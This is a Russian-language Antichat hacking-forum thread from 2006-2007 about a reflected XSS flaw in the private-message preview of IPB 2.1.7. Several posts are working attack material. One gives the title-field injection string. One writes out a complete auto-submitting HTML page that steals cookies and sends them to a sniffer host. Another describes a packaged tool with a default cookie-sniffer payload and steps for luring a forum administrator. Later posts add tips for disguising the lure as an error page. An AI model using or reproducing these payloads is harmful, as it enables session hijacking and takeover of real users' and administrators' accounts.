ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

IPB 2.1.7 passive XSS
  #1  
Старый 02.09.2006, 00:43
Аватар для degeneration x
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию IPB 2.1.7 passive XSS

Вот нашел сейчас пассивный хсс в ипб 2.1.7(на 2.1.4 тоже работает, на остальных не проверял).
При заполнении формы отправки лс, в графу "Заголовок сообщения" пишем:
Код:
">[xss_code]
напрмер:
Код:
"><script>alert();</script>
Жмём предварительный осмотр и вот наш алерт. Удачно использовать багу можно только через Passive Xss tools (предварительно его подправив), т.к. данные принимаются только чрез POST и стоит ограничение на 40 символов.

Passive-Xss-tool by DRON-ANARCHY
и
Passive xss tool by Dg-X (MySQL)

Последний раз редактировалось degeneration x; 05.09.2006 в 15:20..
 

  #2  
Старый 18.12.2006, 18:50
Аватар для def_
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
Провел на форуме:
72325

Репутация: 18
По умолчанию

поясните - какой толк от этой дыры, если она работает только в Предварительном просмотре, при отправки мессаги, код не выполняется, а добавляется в заголовок как обычный текст?
 

  #3  
Старый 19.12.2006, 13:30
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

Составь html ку... используй post
я спомощью такой XSS немало поимел!
 

  #4  
Старый 19.12.2006, 23:11
Аватар для hawt
hawt
Новичок
Регистрация: 11.11.2006
Сообщений: 1
Провел на форуме:
7052

Репутация: 0
По умолчанию

а можно пример такой html - ки?
 

  #5  
Старый 20.12.2006, 08:38
Аватар для def_
def_
Новичок
Регистрация: 30.08.2006
Сообщений: 16
Провел на форуме:
72325

Репутация: 18
По умолчанию

Цитата:
а можно пример такой html - ки?
Если я правильно понял, то должно быть что-то типа:

Код HTML:
<html>
<head> 
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
</head>
<body onLoad="document.REPLIER.submit();">
<h3>Спасибо, сейчас вы будете перенаправлены</h3> <!-- Сюда можешь вставить любой текст или html код -->
<form action="http://---АДРЕС ФОРУМА---/index.php?act=msg" method="post" name="REPLIER"">
<input type="hidden" name="removeattachid" value="0" />
<input type="hidden" name="OID"  value="" />  
<input type="hidden" name="act" value="Msg" />
<input type="hidden" name="CODE" value="04" />
<input type="hidden" name="MODE" value="01" />
<input type="hidden" name="preview" value="Предварительный просмотр">
<input type="hidden" name="msg_title" value='"><script language="JavaScript">aa1 = new Image(); aa1.src="http://---ХОСТ НА КОТОРМ СНИФФЕР---/sniff.php"+document.cookie;</script>'>
</form>	
</body>
</html>
Эту страницу размещаешь где-нибудь в сети, присылаешь на нее ссылку, когда юзер переходит по ней, он автоматически перенаправляется на целевой форум, потом при учете, что по кукисам он зарегенный пользователь( не зарегистрированным нельзя отправлять сообщения ) он попадает на страницу предварительного просмотра написанного сообщения в своем профиле, на которой выполнится JavaScript код, который отправит его куки твоему снифферу.
 

  #6  
Старый 20.12.2006, 20:34
Аватар для Retscan
Retscan
Познающий
Регистрация: 17.12.2006
Сообщений: 32
Провел на форуме:
172639

Репутация: 31
По умолчанию

Passive XSS у меня так и не заработал, так что попытался тут кое-что свое замутить:

Типа скрипт, для юзания данной уязвимости. Инструкция по использованию:
1) Открываем файлик (ipbdeath.htm);
2) Вписываем туда, где указано АДРЕС ФОРУМА-ЖЕРТВЫ;
3) По желанию меняем адрес сниффера. По умолчанию <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
4) Изменяем АДРЕС, КУДА БУДЕТ РЕДИРЕКТИТЬСЯ ПОСЛЕ ОТПРАВКИ КУКИСОВ.
5) Выкладываем этот файлик где-нибудь (не забудьте переименовать, а то "ipbdeath.htm" о многом говорит )
6) Даем на него ссылку админу форума, лучше всего это делать на самом форуме: в топике или в PM.
7) Все, ждем результата на сниффере.

Принцип работы:
1) Пройдя по ссылке, админ попадает на нашу страничку, генерируется нужный POST-запрос. Далее админ автоматически редиректится на страницу отправки PM.
2) Скрипт срабатывает.
3) и страничка сразу редиректится туда, куда вы указали (лучше, думаю, указать на какой-нибудь топик форума, дабы тоже было меньше подозрений).

Принцип работы очень прост, постарался просто облегчить использование xss и немного уменьшить палевность. Еще, если форум закэширован, редиректы проскочут быстро, и можно не заметить особо.

В общем, жду отзывов, просьба ногами не пинать, я нубик пока

IPB Death
 

  #7  
Старый 23.01.2007, 15:45
Аватар для goffog
goffog
Новичок
Регистрация: 06.11.2005
Сообщений: 13
Провел на форуме:
81890

Репутация: 1
По умолчанию

Retscan
А скрипт то не пашет, сам пробывал исправить, ниче не вышло(((
Пришлось делать свое, сделано совсем по другому, что бы усыпить бдительность жертвы, так как не ламер может понять что ему подсунули.Сделал просто напросто фишку под страницу ошибки на narod.ru , чел заходит, а яему ошибку и пишет что сейчас будет перемещен обратно. Но он может все таки просмотреть хтмл код, дык так как я не знаю как закодирывать адресс снифака советую сунуть его в глубь, что б если и просмотрел хтмл код, до него не добрался.
Ну и естественно надо файл кидать на народ, и не забудьте его отредактирывать!
Файлик

Последний раз редактировалось goffog; 23.01.2007 в 15:50..
 

  #8  
Старый 23.01.2007, 15:56
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Бред, не пройдет, т.к. кукисы будут отправляться именно того сервера, где находится твой скрипт =)
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 

  #9  
Старый 23.01.2007, 15:58
Аватар для goffog
goffog
Новичок
Регистрация: 06.11.2005
Сообщений: 13
Провел на форуме:
81890

Репутация: 1
По умолчанию

Думаешь я б его выложил есле б не тестил??
тем более ты принцип не понял.Щас обЪясню
 

  #10  
Старый 23.01.2007, 16:00
Аватар для goffog
goffog
Новичок
Регистрация: 06.11.2005
Сообщений: 13
Провел на форуме:
81890

Репутация: 1
По умолчанию

Скачали файлик, ложим его на свой домен на народе
акк.народ.ру/файл.хтм
и даем админу на форуме, он заходит на сам файл а не на страницу ошибки, сама страница уже вписана в тот файл
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла на Ipb 2.1.7 Thrasher Форумы 15 14.01.2007 14:51
Может кто нибудь определить префикс в Ipb 2.1.7 samurays Форумы 8 06.09.2006 19:42
XSS vbulletin and IPB v2.1.7 With IE liauliau Форумы 6 16.08.2006 15:19
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
XSS в форуме IPB (дополнение) (-=util=-) Форумы 0 13.01.2005 22:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ